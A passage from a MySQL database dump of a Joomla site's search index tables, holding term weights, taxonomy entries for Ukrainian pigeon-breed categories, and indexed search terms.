13,1.02669),(4849,1646949,1.3332),(4849,1646950,5.0668),(4849,1646951,5.6),(4849,1647087,0.84),(4849,1647088,0.91),(4849,1647089,0.95669),(4849,1647090,1.14331),(4849,1647091,4.78345),(4849,1647092,1.07331),(4849,1647093,1.14331),(4849,1647094,1.09669),(4849,1647095,1.09669),(4849,1647096,1.19),(4849,1647097,0.91),(4849,1647098,1.16669),(4849,1647099,0.86331),(4849,1647100,1.12),(4849,1647101,1.26),(4849,1647102,1.4),(4849,1647103,0.46669),(4849,1647104,1.14331),(4849,1647105,1.33),(4849,1647106,0.28),(4849,1647107,1.00331),(4849,1647108,1.05),(4849,1647109,0.51331),(4849,1647110,1.02669),(4849,1647111,1.12),(4849,1647112,0.46669),(4849,1647113,1.09669),(4849,1647114,1.16669),(4849,1647279,0.32669),(4849,1647280,1.14331),(4849,1647281,1.4),(4849,1647282,1.09669),(4849,1647283,1.35331),(4849,1647284,0.14),(4951,1647284,0.34),(4938,1647284,0.42),(4849,1647285,0.81669),(4849,1647286,0.88669),(4849,1647287,0.46662),(4849,1647288,1.02669),(4849,1647289,1.26),(4849,1647290,0.93331),(4849,1647291,1.07331),(4938,1647292,0.23331),(4849,1647292,1.03323),(4849,1647293,3.6),(4849,1647294,4.00008),(4849,1647295,0.93331),(4849,1647296,1.21331),(4849,1647297,0.23331),(4849,1647298,1.02669),(4849,1647299,1.30669),(4849,1647300,0.32669),(4849,1647301,0.98),(4849,1647302,1.05),(4849,1647303,1.05),(4849,1647304,1.21331),(4849,1647305,0.46669),(4849,1647306,1.12),(4849,1647307,1.23669),(4850,1647940,5.4668),(4850,1647941,6.1332),(4850,1647942,2.21),(4850,1647943,2.49339),(4850,1647953,1.92661),(4850,1647954,2.38),(4851,1648009,1.00331),(4851,1648010,1.05),(4852,1648035,0.84),(4852,1648036,1.00331),(4852,1648050,0.91),(4852,1648051,1.19),(4852,1648060,1.02669),(4852,1648061,1.21331),(4852,1648062,0.86331),(4940,1648062,0.86331),(4852,1648063,1.05),(4909,1672178,0.86331),(4909,1672179,1.05),(4909,1672184,0.95669),(4909,1672185,1.02669),(4909,1672186,0.84),(4909,1672187,1.02669),(4909,1672202,1.6),(4909,1672203,5.4668),(4909,1672214,0.09331),(4909,1672215,0.81669),(4909,1672216,1.05),(4909,1672275,0.79331),(4909,1672276,0.86331),(4909,1672277,1.96),(4909,1672278,1.26),(4909,1672279,1.21331),(4909,1672280,0.23331),(4909,1672281,0.98),(4909,1672282,1.21331),(4909,1672283,0.28),(4909,1672284,1.02669),(4909,1672285,1.09669),(4909,1672286,0.56),(4909,1672287,1.14331),(4909,1672288,1.19),(4909,1672403,0.23331),(4909,1672404,1.02669),(4909,1672405,1.09669),(4909,1672406,0.28),(4927,1672406,0.28),(4909,1672407,0.88669),(4909,1672408,1.02669),(4909,1672409,0.18669),(4909,1672410,0.86331),(4909,1672411,1.02669),(4909,1672412,0.14),(4909,1672413,0.86331),(4909,1672414,0.93331),(4917,1678853,2.05338),(4917,1678854,2.28662),(4917,1679039,1.54),(4938,1679039,1.54),(4929,1679039,1.87),(4917,1679040,0.91),(4917,1679041,0.91),(4938,1679041,0.91),(4917,1679042,1.02669),(4917,1679043,1.19),(4917,1679044,0.91),(4917,1679045,1.21331),(4917,1679046,0.98),(4917,1679047,1.05),(4917,1679048,0.88669),(4917,1679049,1.05),(4917,1679050,0.95669),(4917,1679051,1.16669),(4917,1679052,0.91),(4917,1679053,1.21331),(4917,1679054,0.86331),(4917,1679055,1.14331),(4917,1679056,0.95669),(4917,1679057,1.16669),(4917,1679058,0.81669),(4917,1679059,0.98),(4917,1679060,0.88669),(4917,1679061,1.12),(4917,1679062,0.51331),(4917,1679063,1.12),(4917,1679064,1.33),(4917,1679065,0.23331),(4917,1679066,0.88669),(4917,1679067,1.14331),(4917,1679068,1.05),(4917,1679069,1.12),(4917,1679070,0.98),(4917,1679071,1.19),(4917,1679072,0.42),(4917,1679073,1.12),(4917,1679074,1.19),(4917,1679075,0.46669),(4917,1679076,1.07331),(4917,1679077,1.14331),(4917,1679078,1.49324),(4917,1679079,3.57),(4917,1679080,3.78),(4917,1679081,0.95669),(4917,1679082,1.02669),(4917,1679083,0.74662),(4917,1679084,1.02669),(4917,1679085,1.19),(4917,1679086,1.19),(4917,1679087,1.26),(4917,1679088,1.19),(4917,1679089,1.33),(4917,1679090,0.56),(4917,1679091,1.02669),(4917,1679092,1.21331),(4917,1679093,0.86331),(4917,1679094,1.09669),(4917,1679095,0.91),(4917,1679096,1.09669),(4917,1679097,0.37331),(4917,1679098,0.95669),(4917,1679099,1.19),(4917,1679249,1.00331),(4917,1679250,1.07331),(4917,1679251,0.65331),(4917,1679252,1.30669),(4917,1679253,1.4),(4917,1679254,0.46669),(4917,1679255,1.09669),(4917,1679256,1.16669),(4917,1679257,0.28),(4917,1679258,1.07331),(4917,1679259,1.16669),(4917,1679260,0.91),(4917,1679261,1.07331),(4917,1679262,0.32669),(4917,1679263,1.19),(4917,1679264,1.37669),(4917,1679265,0.32669),(4917,1679266,1.02669),(4917,1679267,1.09669),(4917,1679268,0.98007),(4917,1679269,0.95669),(4917,1679270,1.14331),(4917,1679271,1.14331),(4917,1679272,1.35331),(4917,1679273,1.02669),(4917,1679274,1.26),(4917,1679275,1.00331),(4917,1679276,1.14331),(4917,1679277,1.07331),(4917,1679278,0.14),(4917,1679279,0.88669),(4917,1679280,1.09669),(4924,1680535,1.6),(4924,1680536,5.8668),(4924,1680537,6.2668),(4924,1680555,1.3332),(4924,1680556,5.4668),(4924,1680557,6.8),(4924,1680576,0.56661),(4924,1680577,2.21),(4924,1680578,2.32339),(4927,1682705,0.86331),(4927,1682706,1.21331),(4927,1682709,0.95669),(4927,1682710,1.09669),(4927,1682733,1.3332),(4927,1682734,5.6),(4927,1682735,6.5332),(4927,1682917,0.91),(4927,1682918,1.00331),(4927,1682919,0.42),(4927,1682920,1.07331),(4927,1682921,1.30669),(4927,1682922,0.23331),(4927,1682923,0.98),(4927,1682924,1.14331),(4927,1682925,0.51331),(4927,1682926,1.12),(4927,1682927,1.21331),(4927,1682928,0.46669),(4927,1682929,1.09669),(4927,1682930,1.28331),(4927,1682931,0.46669),(4927,1682932,1.09669),(4927,1682933,1.14331),(4927,1682934,0.65331),(4927,1682935,1.19),(4927,1682936,1.30669),(4927,1682937,0.65331),(4927,1682938,1.23669),(4927,1682939,1.4),(4927,1682940,0.46669),(4927,1682941,1.02669),(4927,1682942,1.19),(4927,1682943,0.46669),(4927,1682944,1.02669),(4927,1682945,1.09669),(4927,1682946,0.46669),(4927,1682947,1.09669),(4927,1682948,1.23669),(4927,1682949,0.28),(4927,1682950,0.91),(4927,1682951,1.16669),(4927,1682952,1.12),(4927,1682953,1.00331),(4927,1682954,1.07331),(4927,1682955,1.82),(4927,1682956,1.16669),(4927,1682957,1.05),(4927,1682958,1.02669),(4927,1682959,1.12),(4927,1682960,0.32669),(4927,1682961,0.93331),(4927,1682962,1.16669),(4927,1682963,0.28),(4927,1682964,0.88669),(4927,1682965,1.12),(4927,1682966,0.32669),(4927,1682967,0.91),(4927,1682968,1.05),(4927,1682969,1.23669),(4927,1682970,0.32669),(4927,1682971,0.95669),(4927,1682972,1.05),(4927,1682973,0.28),(4927,1682974,0.98),(4927,1682975,1.19),(4927,1683142,0.93331),(4927,1683143,1.28331),(4927,1683144,0.28),(4927,1683145,1.00331),(4927,1683146,1.09669),(4927,1683147,0.28),(4927,1683148,1.00331),(4927,1683149,1.14331),(4927,1683150,0.91),(4927,1683151,1.07331),(4928,1683732,2.15339),(4928,1683733,2.66339),(4929,1683758,4),(4929,1683759,6.2668),(4929,1683760,6.5332),(4938,1683775,0.93331),(4929,1683775,2.26661),(4930,1683791,0.79339),(4930,1683792,2.43661),(4930,1683793,3.00339),(4934,1683972,2.04),(4957,1683972,2.04),(4934,1683973,2.77661),(4934,1683974,0.91),(4934,1683975,0.95669),(4934,1683976,0.81669),(4934,1683977,0.95669),(4934,1683978,1.12),(4934,1683979,1.16669),(4934,1683996,0.28),(4938,1686114,0.86331),(4938,1686115,1.09669),(4938,1686116,5.4668),(4938,1686117,6.1332),(4940,1686118,0.93331),(4938,1686118,4.13323),(4940,1686119,1.05),(4938,1686119,4.65),(4938,1686120,0.88669),(4938,1686121,1.00331),(4938,1686263,0.93331),(4938,1686264,1.09669),(4938,1686265,0.91),(4938,1686266,1.00331),(4938,1686267,0.98),(4938,1686268,1.14331),(4938,1686269,0.93331),(4938,1686270,1.02669),(4938,1686271,0.98),(4938,1686272,1.21331),(4938,1686273,0.95669),(4940,1686273,1.91338),(4938,1686274,1.07331),(4938,1686275,1.07331),(4938,1686276,1.26),(4938,1686277,0.91),(4940,1686277,0.91),(4938,1686278,0.98),(4940,1686278,0.98),(4938,1686279,0.93331),(4938,1686280,1.16669),(4938,1686281,0.56),(4938,1686282,1.16669),(4938,1686283,1.26),(4938,1686284,0.42),(4938,1686285,1.16669),(4938,1686286,1.23669),(4938,1686287,0.93338),(4938,1686288,2.38),(4938,1686289,1.23669),(4938,1686290,1.37669),(4938,1686291,0.7),(4938,1686292,1.35331),(4938,1686293,1.4),(4938,1686294,0.60669),(4938,1686295,1.19),(4938,1686296,1.4),(4938,1686297,0.60669),(4938,1686298,1.26),(4938,1686299,1.4),(4938,1686300,0.56),(4938,1686301,1.19),(4938,1686302,1.23669),(4938,1686464,0.56),(4938,1686465,1.19),(4938,1686466,1.4),(4938,1686467,1.07331),(4938,1686468,1.33),(4938,1686469,0.84),(4938,1686470,1.07331),(4938,1686471,0.88669),(4938,1686472,1.05),(4938,1686473,1.05),(4938,1686474,1.30669),(4938,1686475,0.56),(4938,1686476,1.09669),(4938,1686477,1.35331),(4938,1686478,1.33),(4938,1686479,1.4),(4938,1686480,0.51331),(4938,1686481,1.05),(4938,1686482,1.35331),(4938,1686483,1.26),(4938,1686484,3.50007),(4938,1686485,3.84993),(4938,1686486,0.46669),(4938,1686487,1.16669),(4938,1686488,1.23669),(4938,1686489,0.60669),(4938,1686490,1.28331),(4938,1686491,1.37669),(4938,1686492,0.65331),(4938,1686493,1.33),(4938,1686494,1.4),(4938,1686495,0.46669),(4938,1686496,1.14331),(4938,1686497,1.35331),(4938,1686498,0.46669),(4940,1686498,0.46669),(4938,1686499,1.19),(4940,1686499,1.19),(4938,1686500,1.33),(4940,1686500,1.33),(4938,1686501,0.84),(4938,1686502,1.02669),(4938,1686503,0.84),(4938,1686504,1.05),(4938,1686505,0.84),(4938,1686506,0.95669),(4938,1686507,0.91),(4938,1686508,1.23669),(4938,1686509,0.95669),(4938,1686510,1.16669),(4938,1686511,2.43661),(4938,1686512,2.72),(4938,1686513,1.12),(4938,1686514,1.19),(4940,1686515,0.86331),(4938,1686515,1.72662),(4940,1686516,0.93331),(4938,1686516,1.86662),(4938,1686517,0.91),(4938,1686518,1.14331),(4938,1686519,0.91),(4938,1686520,1.21331),(4940,1688337,0.95669),(4940,1688338,1.12),(4940,1688339,1.09669),(4940,1688340,1.00331),(4940,1688341,1.19),(4940,1688342,0.86331),(4940,1688343,0.98),(4940,1688344,2.26661),(4940,1688345,2.55),(4940,1688346,2.33338),(4940,1688347,1.07331),(4940,1688348,1.12),(4940,1688349,1.00331),(4940,1688350,1.28331),(4940,1688351,0.84),(4940,1688352,1.09669),(4940,1688353,1.37669),(4940,1688354,1.16669),(4940,1688355,1.4),(4940,1688356,0.42),(4940,1688357,1.16669),(4940,1688358,1.4),(4940,1688359,0.42),(4940,1688360,0.98),(4940,1688361,1.09669),(4940,1688362,0.42),(4940,1688363,1.00331),(4940,1688364,1.23669),(4940,1688365,0.46669),(4940,1688366,1.00331),(4940,1688367,1.4),(4940,1688368,0.37331),(4940,1688369,1.00331),(4940,1688370,1.14331),(4940,1688371,0.46669),(4940,1688372,1.21331),(4940,1688373,1.28331),(4940,1688374,0.51331),(4940,1688375,1.21331),(4940,1688376,1.4),(4940,1688377,0.28),(4940,1688378,0.95669),(4940,1688379,1.05),(4940,1688380,0.28),(4940,1688381,0.98),(4940,1688382,1.21331),(4940,1688576,0.28),(4940,1688577,1.05),(4940,1688578,1.28331),(4940,1688579,1.00331),(4940,1688580,1.23669),(4940,1688581,0.42),(4940,1688582,1.00331),(4940,1688583,1.07331),(4940,1688584,0.46669),(4940,1688585,1.02669),(4940,1688586,1.26),(4940,1688587,2.32339),(4940,1688588,2.72),(4940,1688589,0.32669),(4940,1688590,1.02669),(4940,1688591,1.16669),(4940,1688592,0.42),(4940,1688593,0.98),(4940,1688594,1.14331),(4940,1688595,0.74662),(4940,1688596,1.14331),(4940,1688597,1.30669),(4940,1688598,1.00331),(4940,1688599,1.19),(4940,1688600,0.60669),(4940,1688601,1.05),(4940,1688602,1.21331),(4940,1688603,1.14331),(4940,1688604,0.95669),(4940,1688605,1.07331),(4940,1688606,1.07331),(4940,1688607,0.91),(4940,1688608,1.02669),(4940,1688609,0.84),(4940,1688610,0.98),(4947,1689274,1.0666),(4948,1689274,1.0666),(4946,1689274,2.1332),(4949,1689274,3.1998),(4947,1689292,2.8666),(4947,1689293,3.4),(4947,1689294,2.6668),(4947,1689295,6.1332),(4948,1689326,2.8666),(4948,1689327,3.2),(4949,1689348,2.8666),(4949,1689349,3.4666),(4949,1689350,5.8668),(4951,1689386,2.09661),(4951,1689387,2.32339),(4955,1689471,4.8),(4955,1689475,0.37331),(4955,1689476,1.14331),(4957,1689524,2.66339);
/*!40000 ALTER TABLE `fw3gt_finder_links_termse` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_termsf`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_termsf`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_termsf` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_termsf`
--

LOCK TABLES `fw3gt_finder_links_termsf` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_termsf` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_termsf` VALUES (4594,1523615,0.2666),(4723,1523615,0.2666),(4735,1523615,0.2666),(4764,1523615,0.2666),(4653,1523615,0.5332),(4837,1523615,0.5332),(4850,1523615,0.5332),(4928,1523615,0.5332),(4940,1523615,0.5332),(4951,1523615,0.5332),(4569,1524777,0.23331),(4572,1524777,0.23331),(4661,1524777,0.23331),(4571,1524777,0.69993),(4569,1524778,0.86331),(4572,1524778,0.86331),(4661,1524778,0.86331),(4571,1524778,2.58993),(4569,1524779,1.14331),(4569,1524780,0.14),(4572,1524780,0.14),(4661,1524780,0.14),(4693,1524780,0.14),(4571,1524780,0.42),(4569,1524781,0.95669),(4572,1524781,0.95669),(4661,1524781,0.95669),(4571,1524781,2.87007),(4569,1524782,1.05),(4572,1524782,1.05),(4661,1524782,1.05),(4571,1524782,3.15),(4571,1524967,1.14331),(4571,1524968,1.00331),(4571,1524969,1.14331),(4572,1525020,1.14331),(4593,1527375,0.5334),(4593,1527376,2.7334),(4593,1527377,3.5334),(4594,1527504,0.09331),(4594,1527505,0.91),(4594,1527506,1.02669),(4594,1527507,2.5334),(4616,1547754,1.7334),(4624,1554000,0.14),(4624,1554001,1.07331),(4624,1554002,0.04669),(4770,1554002,0.1334),(4929,1554002,0.2668),(4934,1554002,0.2668),(4957,1554002,0.2668),(4624,1554003,0.77),(4624,1554004,0.81669),(4635,1558505,1.6),(4635,1558506,2.9334),(4635,1558507,3.4666),(4653,1560636,2.6),(4653,1560637,2.9334),(4653,1560638,2.6),(4653,1560639,3.4666),(4653,1560640,1.0666),(4710,1560640,1.0666),(4721,1560640,1.0666),(4929,1560640,2.1332),(4653,1560641,2.8666),(4653,1560642,3.2),(4658,1562947,1.6),(4658,1562948,3.3334),(4658,1562949,3.9334),(4661,1563469,1.14331),(4678,1565370,1.7334),(4678,1565371,3.1334),(4678,1565372,3.8),(4678,1565373,1.7334),(4837,1565373,3.4668),(4850,1565373,3.4668),(4928,1565373,3.4668),(4951,1565373,3.4668),(4678,1565374,3.4),(4837,1565374,6.8),(4850,1565374,6.8),(4928,1565374,6.8),(4951,1565374,6.8),(4687,1568600,1.2),(4687,1568601,3.2666),(4687,1568602,3.8666),(4693,1569302,0.46669),(4693,1569303,1.12),(4693,1569304,1.23669),(4693,1569305,1.00331),(4693,1569306,1.09669),(4710,1592172,1.3334),(4710,1592173,3.2666),(4710,1592174,2.8),(4710,1592175,3.5334),(4721,1602924,3),(4721,1602925,3.5334),(4723,1604958,2.2666),(4723,1604959,2.9334),(4734,1615888,1.8666),(4734,1615889,1.0666),(4734,1615890,3.1334),(4734,1615891,3.3334),(4735,1617939,2.6666),(4735,1617940,3.4),(4764,1629044,2.3334),(4764,1629045,3),(4770,1629211,2.4666),(4770,1629212,2.8),(4803,1644933,0.8),(4803,1644934,0.9334),(4927,1644934,1.8668),(4803,1644935,3.4),(4927,1644935,6.8),(4803,1644936,3.7334),(4927,1644936,7.4668),(4837,1646514,4.5332),(4837,1646515,5.7332),(4837,1646516,7.2),(4850,1646516,7.2),(4928,1646516,7.2),(4951,1646516,7.2),(4850,1647948,4.5332),(4850,1647949,5.8668),(4928,1683730,5.2),(4928,1683731,6.8),(4929,1683764,4.4),(4929,1683765,5.6),(4929,1683766,5.4668),(4929,1683767,6.1332),(4930,1683788,2.1332),(4930,1683789,5.8668),(4930,1683790,7.2),(4934,1683962,4.8),(4957,1683962,4.8),(4934,1683963,6.6668),(4940,1688222,5.0668),(4940,1688223,5.7332),(4940,1688224,1.3332),(4940,1688225,5.3332),(4951,1689384,4.9332),(4951,1689385,5.4668),(4957,1689521,6.2668);
/*!40000 ALTER TABLE `fw3gt_finder_links_termsf` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_taxonomy`
--

DROP TABLE IF EXISTS `fw3gt_finder_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_taxonomy` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL,
  `state` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `access` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` tinyint(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `parent_id` (`parent_id`),
  KEY `state` (`state`),
  KEY `ordering` (`ordering`),
  KEY `access` (`access`),
  KEY `idx_parent_published` (`parent_id`,`state`,`access`)
) ENGINE=InnoDB AUTO_INCREMENT=311 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_taxonomy`
--

LOCK TABLES `fw3gt_finder_taxonomy` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_taxonomy` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_taxonomy` VALUES (235,1,'Type',1,1,0),(237,1,'Author',1,1,0),(239,1,'Category',1,1,0),(241,1,'Language',1,1,0),(243,235,'Article',1,1,0),(244,237,'Super User',1,1,0),(246,241,'*',1,1,0),(249,235,'Category',1,1,0),(266,239,'Павліни (павичі)',1,1,0),(267,239,'Поштові',1,1,0),(268,239,'Кінги',1,1,0),(276,235,'Tag',1,1,0),(282,239,'Відео',1,1,0),(283,239,'Засоби захисту',1,1,0),(285,239,'Інформація голубівникам',1,1,0),(292,239,'головна',1,1,0),(295,1,'Region',1,1,0),(297,1,'Country',1,1,0),(299,235,'Contact',1,1,0),(300,239,'Uncategorised',1,1,0),(301,295,'Житомирська',1,1,0),(302,297,'Україна',1,1,0),(307,239,'Померанські дутиші',1,1,0),(309,239,'Адана турецька',1,1,0),(310,239,'Контакти',1,1,0);
/*!40000 ALTER TABLE `fw3gt_finder_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_taxonomy_map`
--

DROP TABLE IF EXISTS `fw3gt_finder_taxonomy_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_taxonomy_map` (
  `link_id` int(10) unsigned NOT NULL,
  `node_id` int(10) unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`node_id`),
  KEY `link_id` (`link_id`),
  KEY `node_id` (`node_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_taxonomy_map`
--

LOCK TABLES `fw3gt_finder_taxonomy_map` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_taxonomy_map` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_taxonomy_map` VALUES (4538,246),(4538,249),(4539,246),(4539,249),(4540,246),(4540,249),(4541,246),(4541,249),(4543,246),(4543,249),(4552,246),(4552,249),(4569,243),(4569,244),(4569,246),(4569,266),(4571,243),(4571,244),(4571,246),(4571,266),(4572,243),(4572,244),(4572,246),(4572,266),(4574,243),(4574,244),(4574,246),(4574,268),(4580,246),(4580,249),(4581,246),(4581,249),(4585,244),(4585,246),(4585,276),(4591,246),(4591,249),(4592,246),(4592,249),(4593,243),(4593,244),(4593,246),(4593,282),(4594,243),(4594,244),(4594,246),(4594,283),(4595,246),(4595,249),(4604,243),(4604,244),(4604,246),(4604,285),(4608,243),(4608,244),(4608,246),(4608,285),(4614,243),(4614,244),(4614,246),(4614,285),(4616,243),(4616,244),(4616,246),(4616,285),(4617,243),(4617,244),(4617,246),(4617,285),(4624,243),(4624,244),(4624,246),(4624,285),(4625,243),(4625,244),(4625,246),(4625,285),(4626,243),(4626,244),(4626,246),(4626,285),(4635,243),(4635,244),(4635,246),(4635,285),(4653,243),(4653,244),(4653,246),(4653,292),(4658,243),(4658,244),(4658,246),(4658,292),(4661,243),(4661,244),(4661,246),(4661,267),(4664,243),(4664,244),(4664,246),(4664,292),(4669,243),(4669,244),(4669,246),(4669,267),(4672,243),(4672,244),(4672,246),(4672,292),(4673,243),(4673,244),(4673,246),(4673,292),(4678,243),(4678,244),(4678,246),(4678,292),(4687,243),(4687,244),(4687,246),(4687,292),(4693,243),(4693,244),(4693,246),(4693,292),(4710,243),(4710,244),(4710,246),(4710,292),(4721,243),(4721,244),(4721,246),(4721,292),(4723,243),(4723,244),(4723,246),(4723,292),(4727,243),(4727,244),(4727,246),(4727,282),(4732,243),(4732,244),(4732,246),(4732,292),(4734,243),(4734,244),(4734,246),(4734,292),(4735,243),(4735,244),(4735,246),(4735,292),(4736,243),(4736,244),(4736,246),(4736,292),(4741,243),(4741,244),(4741,246),(4741,267),(4749,243),(4749,244),(4749,246),(4749,267),(4753,243),(4753,244),(4753,246),(4753,268),(4755,246),(4755,299),(4755,300),(4755,301),(4755,302),(4759,243),(4759,244),(4759,246),(4759,292),(4761,243),(4761,244),(4761,246),(4761,292),(4762,243),(4762,244),(4762,246),(4762,292),(4764,243),(4764,244),(4764,246),(4764,292),(4766,246),(4766,249),(4767,243),(4767,244),(4767,246),(4767,292),(4770,243),(4770,244),(4770,246),(4770,292),(4771,246),(4771,249),(4773,243),(4773,244),(4773,246),(4773,307),(4776,243),(4776,244),(4776,246),(4776,292),(4777,243),(4777,244),(4777,246),(4777,292),(4778,243),(4778,244),(4778,246),(4778,292),(4780,243),(4780,244),(4780,246),(4780,292),(4798,243),(4798,244),(4798,246),(4798,285),(4799,243),(4799,244),(4799,246),(4799,267),(4803,243),(4803,244),(4803,246),(4803,292),(4804,243),(4804,244),(4804,246),(4804,292),(4806,243),(4806,244),(4806,246),(4806,267),(4808,243),(4808,244),(4808,246),(4808,307),(4809,243),(4809,244),(4809,246),(4809,292),(4813,243),(4813,244),(4813,246),(4813,267),(4814,243),(4814,244),(4814,246),(4814,267),(4837,243),(4837,244),(4837,246),(4837,292),(4839,243),(4839,244),(4839,246),(4839,268),(4847,243),(4847,244),(4847,246),(4847,268),(4849,243),(4849,244),(4849,246),(4849,292),(4850,243),(4850,244),(4850,246),(4850,292),(4851,243),(4851,244),(4851,246),(4851,267),(4852,243),(4852,244),(4852,246),(4852,268),(4857,243),(4857,244),(4857,246),(4857,267),(4909,243),(4909,244),(4909,246),(4909,292),(4917,243),(4917,244),(4917,246),(4917,292),(4918,243),(4918,244),(4918,246),(4918,292),(4924,243),(4924,244),(4924,246),(4924,292),(4927,243),(4927,244),(4927,246),(4927,292),(4928,243),(4928,244),(4928,246),(4928,292),(4929,243),(4929,244),(4929,246),(4929,292),(4930,243),(4930,244),(4930,246),(4930,267),(4931,243),(4931,244),(4931,246),(4931,267),(4934,243),(4934,244),(4934,246),(4934,292),(4935,243),(4935,244),(4935,246),(4935,292),(4938,243),(4938,244),(4938,246),(4938,292),(4940,243),(4940,244),(4940,246),(4940,292),(4945,243),(4945,244),(4945,246),(4945,292),(4946,246),(4946,249),(4947,243),(4947,244),(4947,246),(4947,309),(4948,243),(4948,244),(4948,246),(4948,309),(4949,243),(4949,244),(4949,246),(4949,309),(4951,243),(4951,244),(4951,246),(4951,292),(4953,243),(4953,244),(4953,246),(4953,292),(4954,243),(4954,244),(4954,246),(4954,266),(4955,243),(4955,244),(4955,246),(4955,310),(4956,243),(4956,244),(4956,246),(4956,292),(4957,243),(4957,244),(4957,246),(4957,282);
/*!40000 ALTER TABLE `fw3gt_finder_taxonomy_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_terms`
--

DROP TABLE IF EXISTS `fw3gt_finder_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_terms` (
  `term_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '0',
  `soundex` varchar(75) NOT NULL,
  `links` int(10) NOT NULL DEFAULT '0',
  `language` char(3) NOT NULL DEFAULT '',
  PRIMARY KEY (`term_id`),
  UNIQUE KEY `idx_term` (`term`),
  KEY `idx_term_phrase` (`term`,`phrase`),
  KEY `idx_stem_phrase` (`stem`,`phrase`),
  KEY `idx_soundex_phrase` (`soundex`,`phrase`)
) ENGINE=InnoDB AUTO_INCREMENT=1689527 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_terms`
--

LOCK TABLES `fw3gt_finder_terms` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_terms` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_terms` VALUES (1523574,'2020','2020',0,0,0.4,'',13,'*'),(1523575,'2020 roku','2020 roku',0,1,1.3,'R200',5,'*'),(1523576,'2020 року','2020 року',0,1,1.3,'р000',9,'*'),(1523578,'7','7',0,0,0.1,'',5,'*'),(1523583,'byudzhetiv','byudzhetiv',0,0,0.6667,'B3231',6,'*'),(1523584,'byudzhetiv mist','byudzhetiv mist',0,1,1.5,'B3231523',2,'*'),(1523585,'byudzhetiv mist rajoniv','byudzhetiv mist rajoniv',0,1,1.7667,'B32315236251',2,'*'),(1523586,'chastini','chastini',0,0,0.5333,'C350',6,'*'),(1523587,'chastini byudzhetiv','chastini byudzhetiv',0,1,1.6333,'C3513231',6,'*'),(1523588,'chastini byudzhetiv mist','chastini byudzhetiv mist',0,1,1.8,'C3513231523',2,'*'),(1523589,'dokhidnoji','dokhidnoji',0,0,0.6667,'D2352',6,'*'),(1523590,'dokhidnoji chastini','dokhidnoji chastini',0,1,1.6333,'D235235',6,'*'),(1523591,'dokhidnoji chastini byudzhetiv','dokhidnoji chastini byudzhetiv',0,1,2,'D23523513231',6,'*'),(1523592,'index','index',0,0,0.3333,'I532',75,'*'),(1523593,'mist','mist',0,0,0.2667,'M230',2,'*'),(1523594,'mist rajoniv','mist rajoniv',0,1,1.4,'M236251',2,'*'),(1523595,'mist rajoniv ta','mist rajoniv ta',0,1,1.5,'M2362513',2,'*'),(1523596,'misyatsiv','misyatsiv',0,0,0.6,'M2321',3,'*'),(1523597,'misyatsiv 2020','misyatsiv 2020',0,1,1.4667,'M2321',2,'*'),(1523598,'misyatsiv 2020 roku','misyatsiv 2020 roku',0,1,1.6333,'M232162',2,'*'),(1523599,'otg','otg',0,0,0.2,'O320',6,'*'),(1523600,'otg za','otg za',0,1,1.2,'O320',2,'*'),(1523602,'rajoniv','rajoniv',0,0,0.4667,'R251',2,'*'),(1523603,'rajoniv ta','rajoniv ta',0,1,1.3333,'R2513',2,'*'),(1523604,'rajoniv ta otg','rajoniv ta otg',0,1,1.4667,'R25132',2,'*'),(1523605,'roku','roku',0,0,0.2667,'R200',15,'*'),(1523606,'super','super',0,0,0.3333,'S160',88,'*'),(1523607,'super user','super user',0,1,1.3333,'S1626',88,'*'),(1523608,'ta','ta',0,0,0.1333,'T000',9,'*'),(1523609,'ta otg','ta otg',0,1,1.2,'T200',2,'*'),(1523610,'ta otg za','ta otg 